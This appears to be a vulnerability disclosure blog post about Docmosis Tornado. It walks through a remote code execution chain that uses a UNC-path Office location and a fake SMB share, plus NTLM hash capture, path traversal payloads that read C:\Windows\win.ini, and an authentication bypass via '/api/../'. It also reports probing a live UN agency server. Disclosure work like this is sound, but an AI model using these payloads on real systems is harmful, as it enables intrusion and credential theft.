This first vulnerability relies on the fact that the web UI field **“Open/Libre Office location”** can be changed, pointing to the _LibreOffice_ installation directory. All configuration changes are persisted after the corresponding _GWT-based_ HTTP POST request is sent to /webserverdownload/configure. The corresponding URL mapping can be found in the web descriptor web.xml.

    <servlet-mapping>
      <servlet-name>ConfigurationServlet</servlet-name>
      <url-pattern>/webserverdownload/configure</url-pattern>
    </servlet-mapping>
    ...
    <servlet>
      <servlet-name>ConfigurationServlet</servlet-name>
      <servlet-class>com.docmosis.webserver.server.ConfigurationServiceImpl</servlet-class>
    </servlet>
    

The responsible Java interface extends com.google.gwt.user.server.rpc.RemoteServiceServlet, finally leading to the implementing class com.docmosis.webserver.server.ConfigurationServiceImpl. The method com.docmosis.webserver.server.ConfigurationServiceImpl.saveConfiguration(ConfigBean) is called then with the parameters given in the request. There exists a validation method com.docmosis.webserver.server.ConfigurationServiceImpl.serverSideValidate(ConfigBean) which checks access to the Office location directory.

    String[] expectedFolders = DMProperties.getStringArray("docmosis.openoffice.location.binary.searchpath", ";");
    boolean subFolderFound = false;
    for (String expected : expectedFolders) {
      File subFolder = new File(officePathFile, expected);
      if (subFolder.canRead() && subFolder.isDirectory()) {
        subFolderFound = true;
        
        break;
      } 
    } 
    

The expectedFolders member seems to be used to check for expected folders matching a valid Office installation. The same is done for the Template directories etc. No further validations with respect to security are done. On a standard Windows installation, an **UNC network share path** could be used to point the Office directory to a remote host. The Office executable soffice.exe is used for converter functions etc. and therefore is observable in the process tree of Docmosis Tornado after being started.

Now, changing the **Open/Libre Office location** value to a remote network share path allows to load an **arbitrary malicious .exe file** named soffice.exe instead. After a restart of Docmosis Tornado, this would be fetched and executed, allowing an attacker to executing arbitrary code on the targeted machine. This already is a critical vulnerability in itself but **requires user interaction** on the server-side for the _restart_. **The web UI does not provide any restart functions**. Looking again at the GWT service implementation, we find the method com.docmosis.webserver.server.ConfigurationServiceImpl.restartServer() which indeed allows exactly this via a properly crafted GWT HTTP request. This makes the **user interaction restriction obsolete**. To following steps have to be taken to prove the Remote Code Execution (RCE).

*   We create a “malicious” soffice.exe file with a C cross compiler with the following code underneath.

    void main()
    {
    	system("cmd.exe /C calc");
    }
    

*   We mimick the directory/file structure of a valid LibreOffice installation on our remote attacker server.
    
*   We provide a fake SMB server with help of the impacket suite.
    
*   We change the Office location in the web UI pointing to this server \\10.137.0.16\myshare\LibreOffice.
    

*   We observe NTLM authentication on our fake SMB server.

*   We trigger the restart of the Tornado service and got code execution, i.e. our malicious soffice.exe got executed, popping a Windows calculator.

Since the targeted server uses NTLM authentication to login to the attacker’s fake SMB server, this could of course be used to capture the **NetNTLM hash**. This hash could be cracked offline, so finally an attacker would have had valid Windows credentials to access the server via other channels.

**Multiple Path Traversals - File Read**

In general, no proper validation of file system operations with respect to traversal attacks can be found. This allows various attack vectors leading to file disclosure out of the context directories specified within the Tornado application.

**Restricted File Read**

First, we show a file read primitive with a few restrictions for the attacker. The **“Source Templates From”** directory is set to C:\Users\user\Desktop\templates in our lab environment.

Using the function _“Creating dummy data based on template”_ in the web UI fills the _Data_ text field automatically so afterwards we can click the _Test_ button to create e.g. a PDF file. Next to our templates directory, mentioned above, we put a file with fake secret data C:\Users\user\Desktop\secretfolder\secret.txt. Now the request is intercepted and a path traversal payload injected into the template reference path.

Indeed, the generated document contains the content of the secret file: a file located at a completely different folder than C:\Users\user\Desktop\templates.

This seems at least be restricted to certain file types but nevertheless is a juicy vulnerability.

**Full File Read**

The most dangerous path traversal vulnerability originates from the service call to /fetch?filename=[SOME_NAME].pdf. This is called after we generated the PDF file above to automatically download the file content from the server.

The corresponding implementation can be found in com.docmosis.webserver.servlet.FetchTmp.doGet(HttpServletRequest, HttpServletResponse). The filename request parameter is used within a String concatenation to retrieve the file.

    filename = request.getParameter("filename");
    filename = System.getProperty("java.io.tmpdir") + "/" + filename;
    

This allows an attacker to again introduce relative path segments, giving access to arbitrary files on the server file system. Here, we show reading the file C:\Windows\win.ini.

**Authentication Bypass**

Even though, the default installation does not require an _Admin password_ being set, the web UI indeed provides a configuration field. To test this, we set a password, clicked the logout button and indeed are redirected to the login page.

Also our full file read vulnerability now cannot be exploited anymore from an unauthenticated content (_still exploitable as authenticated user, though_).

Looking at the web descriptor file web.xml reveals that an authentication filter is set in place for all URI paths.

    <filter-mapping>
    	<filter-name>AuthenticatedCheckFilter</filter-name>
    	<url-pattern>/*</url-pattern>
    </filter-mapping> 
    

Every request has to go through the Java Servlet filter com.docmosis.webserver.servlet.AuthenticatedCheckServlet.doFilter(ServletRequest, ServletResponse, FilterChain). Surprisingly, the authentication check can be bypassed to reach the final chain.doFilter(request, response) call. Responsible for this is the following code path:

    if (!authenticated) // [1]
    {
      if (!isRestCall) { // [2]
    
    
    
        
        WebServerPreferences prefs = WebServerPreferencesStore.getPrefs();
        boolean authenticationRequired = !StringUtilities.isEmpty(prefs.getAdminPassword());
        
        if (authenticationRequired) { // [3]
          
          if (isGWTRPCCall) {
            
            ((HttpServletResponse)response).sendError(401); return;
          } 
          if (!this.authPostUrl.equals(req.getRequestURI())) {
            
            RequestDispatcher rd = req.getRequestDispatcher("/authenticate.jsp");
            rd.forward(request, response);
    
            
            return;
          } 
        }
    } 
    

At \[1\], it is properly checked if the user is already authenticated. If not, the if branch is entered. If this request is not part of a REST call \[2\] and an Admin password is set \[3\], then access is denied. The problem now relies in the check if isRestCall is true/false.

    boolean isRestCall = req.getRequestURI().startsWith("/api/")
    

Our path traversal attack e.g. /fetch?filename=../../../../../Windows/win.ini indeed does not start with /api but at this point of HTTP request processing, a simple bypass is possible due to using the startsWith String method. Using an URI path with relative path segments like /api/../fetch?filename=../../../../../Windows/win.ini bypasses the authentication check and triggers the file read primitive again.

**Internet Exposure Check**

These findings were shared with the vendor and they released **version 2.9.5** to address these issues (I did not validate the patches, though). Checking the exposure rate of this software on the public Internet, one of the systems found was **\[REDACTED\].upu.int**. Even though, this instance was not using the latest version, the same vulnerabilities still worked fine.

As it turned out, this system belongs to the **Universal Postal Union (UPU)**, a specialized agency of the United Nations (UN). Additionally, this system seemed to be part of the official UPU network, i.e. no cloud-hosted instance but rather an entry point to the network of UPU.

The system exposed a web UI of Docmosis Tornado with default configurations, i.e. no authentication needed at all. Even if authentication would have been needed, we already found an **Authentication Bypass**.

To prove the system to be vulnerable, we read the content of C:\Windows\win.ini and provided the report as quickly as possible.

**Acknowledgements**

Many thanks to Carlos from UNICC to forward my requests to UPU quickly. Also the Docmosis team communicated fast and professionally.

P.S.: I’m pretty sure there’re more vulnerabilities in this product. Go, practice and responsibly disclose issues to the Docmosis team. Maybe you’ll find a deserialization vulnerability somewhere _\*hint\*_.

Tag

#java